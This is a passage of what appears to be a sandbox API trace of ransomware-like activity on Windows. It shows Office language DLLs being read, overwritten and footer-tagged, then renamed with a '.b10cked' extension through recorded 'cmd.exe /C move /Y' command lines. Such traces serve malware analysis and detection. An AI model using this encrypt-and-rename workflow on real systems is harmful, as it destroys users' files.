[0169.476] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0169.477] CloseHandle (hObject=0x114) returned 1 [0169.481] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX") returned 0x3c [0169.482] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0169.483] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked\"", 
lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x9bc, dwThreadId=0x9ac)) returned 1 [0169.491] CloseHandle (hObject=0x1b4) returned 1 [0169.491] CloseHandle (hObject=0x114) returned 1 [0169.491] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0169.491] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0169.491] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0169.491] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.491] ReleaseMutex (hMutex=0xf8) returned 1 [0169.491] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.491] ReleaseMutex (hMutex=0xf8) returned 1 [0169.491] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0169.491] ReleaseMutex (hMutex=0xf8) returned 1 [0169.491] WaitForSingleObject (hHandle=0xf8, 
dwMilliseconds=0xffffffff) returned 0x0 [0169.491] ReleaseMutex (hMutex=0xf8) returned 1 [0169.491] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\ppintl.rest.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.606] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22639509765) returned 1 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.606] SetFilePointer (in: hFile=0x114, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.606] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.607] 
SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.607] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.608] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x43560 [0169.608] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0169.608] SetFilePointer (in: hFile=0x114, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x43078 [0169.608] ReadFile (in: hFile=0x114, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: 
lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0169.834] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0169.834] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0169.834] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x43560 [0169.834] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0169.834] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0169.834] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0169.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x43560 [0169.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0169.835] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0169.835] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0169.868] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, 
lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0169.883] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0169.885] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0169.885] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0169.886] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0169.886] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0169.886] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x23560 [0169.886] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0169.887] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0169.888] ReadFile (in: hFile=0x114, lpBuffer=0x1230018, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1230018*, 
lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0169.889] SetFilePointer (in: hFile=0x114, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x23560 [0169.890] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0169.890] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0169.890] WriteFile (in: hFile=0x114, lpBuffer=0x146fed8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x146fed8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0169.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0169.898] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PPINTL.REST.trx_dll", cchWideChar=19, lpMultiByteStr=0x1328744, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PPINTL.REST.trx_dll", lpUsedDefaultChar=0x0) returned 19 [0169.899] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x43560 [0169.899] WriteFile (in: hFile=0x114, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0169.899] CloseHandle (hObject=0x114) returned 1 [0169.902] GetShortPathNameW (in: 
lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PPINTL.REST.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX") returned 0x3c [0169.903] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0169.903] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL~2.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\PPINTL.REST.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x114, dwProcessId=0x9cc, dwThreadId=0x9c0)) returned 1 [0171.970] CloseHandle (hObject=0x1b4) returned 1 [0171.971] CloseHandle (hObject=0x114) returned 1 [0171.971] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0171.971] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: 
lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0171.971] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0171.971] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0171.971] ReleaseMutex (hMutex=0xf8) returned 1 [0171.971] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0171.971] ReleaseMutex (hMutex=0xf8) returned 1 [0171.971] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0171.971] ReleaseMutex (hMutex=0xf8) returned 1 [0171.971] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0171.971] ReleaseMutex (hMutex=0xf8) returned 1 [0171.971] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\PUB6INTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\3082\\pub6intl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x114 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a560 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.972] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=22876106697) returned 1 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: 
lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a560 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a560 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.972] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x1a560 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecf8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecf8*=0) returned 0x0 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a560 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, 
lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a560 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a560 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.973] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a560 [0171.974] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.974] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.974] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x1a560 [0171.974] SetFilePointer (in: hFile=0x114, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0171.974] SetFilePointer (in: 
